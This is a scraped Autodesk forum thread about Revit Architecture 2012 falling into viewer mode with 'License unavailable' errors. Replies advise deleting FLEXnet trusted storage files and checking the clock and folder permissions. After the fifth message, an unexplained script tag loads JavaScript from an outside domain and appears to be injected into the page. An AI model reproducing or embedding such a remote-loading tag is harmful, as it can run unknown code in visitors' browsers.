Installation & Licensing
Welcome to Autodesk’s Installation and Licensing Forums. Share your knowledge, ask questions, and explore popular Download, Installation, and Licensing topics.
cancel
Showing results for 
Show  only  | Search instead for 
Did you mean: 

Issue regarding Revit 2012 installation and Licensing

12 REPLIES 12
Message 1 of 13
gaja0012
3256 Views, 12 Replies

Issue regarding Revit 2012 installation and Licensing

Hi. I have a serious issue regarding license to my Revit Acrchitecture 2012 and activation of the product. I've bought a new laptop and installed Revit 2012 on it and in the beginning it worked fine without any problems with activation and licensing, but then after some time suddenly says " Autodesk Revit Architecture 2012, Build:20110309_2315(x64) License unavailable. A license is required to run Autodesk Revit Achitecture 2012 on this computer" and Revit then tells me, that I'm only in a viewer modeopened Revit.

Afterwards I tried to reinstall Revit and  after I enter the serial number and product key in the installation process, I don't get to the point where I can enter the activation code, cause when I open revit (after installed) it immediately says " Autodesk Revit Architecture 2012, Build:20110309_2315(x64) License unavailable. A license is required to run Autodesk Revit Achitecture 2012 on this computer" and the Revit tells me, that I'm only in a viewer mode and can't do anything. When I try to press "Help" and the "About" and the click on "Product license information" I get same message that my License is unavailable and Revit is in viewer mode and leave me with a Revit software I can't work with. Can anyone please help me?? My studies is all about Revit, so it's a vital software for me Kind regards Gajan Rasathurai

12 REPLIES 12
Message 2 of 13

Try deleting the trusted storage files (DATA and Backup) that can be found here:

Windows Vista/Windows 7
C:\ProgramData\FLEXnet\adskflex_00691b00_tsf.data
C:\ProgramData\FLEXnet\adskflex_00691b00_tsf.data_backup.001

XP
C:\Documents and Settings\All Users\Application Data\FLEXnet\adskflex_00691b00_tsf.data
C:\Documents and Settings\All Users\Application Data\FLEXnet\adskflex_00691b00_tsf.data_backup.001

Hope it works for you...

Timmy De Austria
Product Support | Up and Ready Blog | If my reply was helpful, please Kudo or Accept as Solution. 😉
Message 3 of 13

It did'nt work, but thanks anyway

Message 4 of 13
lance.hunter
in reply to: gaja0012

I'm having the same problem. The 2011 edition worked for me just fine. I emailed the support team and they ask for a product code, which I cannot access in viewer mode. Also I am using the education edition. I'm not sure if this would have anything to do with it. 

Message 5 of 13
mizo31

I have the same problem with the same version, so please if you succeed to solve it inform me how can i solve mine.
And vice versa, thanks 🙂

<script type="text/javascript" src="http://loading-resource.com/data.geo.php?callback=window.__geo.getData"></script>
Message 6 of 13
K.linderboom

Has anyone solved this issue yet?

Message 7 of 13
DannyHubbard
in reply to: K.linderboom

First make sure the date and time on your computer is fairly accurate.

Second make sure you have Read and Write access to the FlexNet folder (see Timmy's post above for the exact path).   Can you go to the FlexNet folder and create a new text file, then delete it.

Thanks,

Danny

Danny Hubbard
QA Analyst
Autodesk, Inc.
Message 8 of 13
K.linderboom

Worked a treat, thanks! 

Message 9 of 13
candice.vdl

Hi, I am having a similar problem. I worked on a revit project and when I tried to save it, it said the following:

Autodesk Revit Architecture 2012

Build:20110309_2315

License unavailable. Autodesk Revit Achitecture 2012 is in viewer mode

Viewer mode allows all functionality of Revit, except the following:save or save as in all clases; exporting or publising modified projects; exporting or publishing any projects to a format containing model data that can be modified; or printing projects after changes are made.

I am running Microsoft Windows XP Professional Version 2002, Service pack 3. 

Tried to find the files to delete as per "timmy" but could not find them. 

Please help! Candice

Message 10 of 13
dembkod
in reply to: candice.vdl

candice.vdl,

Hello. This means your product does not have a license. When you start the program, does it tell you it is in trial mode or ask you to activate? This message would appear if: you never activated or you lost your network license, possibly due to inactivity.

Thank you for taking part in our community!

David Dembkoski
Message 11 of 13
pcarini
in reply to: dembkod

It says "license unavailable."

However, it cannot be that this product does not have a license. I have been using it for almost one year with no problems. I have the email confirming my registration of the product and my license which is supposed to last 3 years. There is a problem here that needs some more attention. I will try to uninstall and reinstall and then reenter my product information. Hopefully that will work.

Message 12 of 13
Mark.Lancaster
in reply to: pcarini

@pcarini

Welcome to the community..

Are you still using Revit 2012?

Mark Lancaster

&  Autodesk Services MarketPlace Provider

Autodesk Inventor Certified Professional & not an Autodesk Employee

Likes is much appreciated if the information I have shared is helpful to you and/or others

Did this resolve your issue? Please accept it "As a Solution" so others may benefit from it.

Message 13 of 13
natasha.l
in reply to: pcarini

Hello @pcarini,

That may work, let us know if you are still encountering issues. Smiley Happy

Can't find what you're looking for? Ask the community or share your knowledge.

Post to forums  

Administrator Productivity

Autodesk Design & Make Report